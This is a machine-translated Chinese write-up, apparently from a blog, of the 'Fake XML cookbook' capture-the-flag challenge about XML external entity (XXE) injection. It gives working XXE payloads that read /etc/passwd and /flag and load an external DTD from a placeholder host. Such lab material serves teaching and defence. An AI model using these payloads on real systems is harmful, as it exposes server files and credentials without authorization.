当前位置:网站首页>Fake XML cookbook of XML xxE vulnerability
Fake XML cookbook of XML xxE vulnerability
2022-07-23 15:50:00 【A traveler】
Knowledge point :
What is? xxe
Five minutes to understand what is XXE Loophole
utilize
XML Loophole _cjm..... The blog of -CSDN Blog _xml Loophole
XXE Loophole ——XML Injection of external entities (XML External Entity)
When the application is uploaded by the user XML File or POST Request data transmission , And the application does not prohibit XML Reference external entities , There is also no filtering of user submitted XML data , Then there will be XML External entity injection vulnerability , namely XXE Loophole
example 1:
<?xml version="1.0"?><!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd" >]><x>&b;</x>
If the above xml The code is parsed , Will return /etc/passwd The content of the document .
example 2:
<?xml version="1.0"?><!DOCTYPE a [<!ENTITY % d SYSTEM "http://xxx.com/xxe.dtd" >%d;]><x>&xxe;</x>
http://xxxx.com/xxe.dtd The content is :
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
Some friends may have found , example 1 There is no %, For example 2 There is % Of , The difference here is , example 1 The entities defined in are generic entities , For example 2 Parameter entities are defined in , And the parameter entity can only be in dtd Use in , That is an example 2 The third line in the code %d;, It's like referencing unified entities outside , there %d; I quoted http://xxx.com/xxe.dtd This file goes to dtd in .
example 3:
<?xml version="1.0"?><!DOCTYPE a SYSTEM "http://xxx.com/xxe.dtd"><x>&xxe;</x>
http://xxxx.com/xxe.dtd The content is :
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
This question :
Grab the bag :
Direct vulnerability xml Entity :
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<user><username>&admin;</username><password>123456</password></user>Be careful , Entities have templates ;
Then continue to open flag:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123456</password></user>
边栏推荐
猜你喜欢
在一个有序数组中查找具体的某个数字(二分查找or折半查找)
C语言经典例题-用4×4矩阵显示从1到16的所有整数,并计算每行、每列和每条对角线上的和
![[200 opencv routines] 225. Fourier descriptor for feature extraction](/img/4b/1f373505ffd5c0dbaa5c20431c4b42.png)
[200 opencv routines] 225. Fourier descriptor for feature extraction
select......for update 语句的功能是什么? 会锁表还是锁行?
harbor镜像仓库
Guangzhou held a competition for quality and safety supervisors of agricultural products in the town and street
奔驰新能源产品线:豪华新能源市场或将改变格局
One minute rule for sequential disk access
centos7 中彻底卸载mysql
记一次SQL优化
随机推荐
bgp基本配置
Redis 删除Key命令会导致阻塞么?
Deep understanding of L1 and L2 regularization
【攻防世界WEB】难度三星9分入门题(下):shrine、lottery
对C语言最基本的代码解释
select......for update 语句的功能是什么? 会锁表还是锁行?
C语言经典例题-逆序打印输入的两位数
Six ways of uniapp route jump
The difference between cookies and sessions
Time series data in industrial Internet of things
Can multithreading optimize program performance?
[200 opencv routines] 225. Fourier descriptor for feature extraction
Fileinputformat of MapReduce inputformat
pydensecrf安装
MySQL执行顺序
C语言经典例题-求最少数量钞票
奔驰新能源产品线:豪华新能源市场或将改变格局
C语言经典例题-两个分数相加
3D数学 - 矢量
Analysis of data governance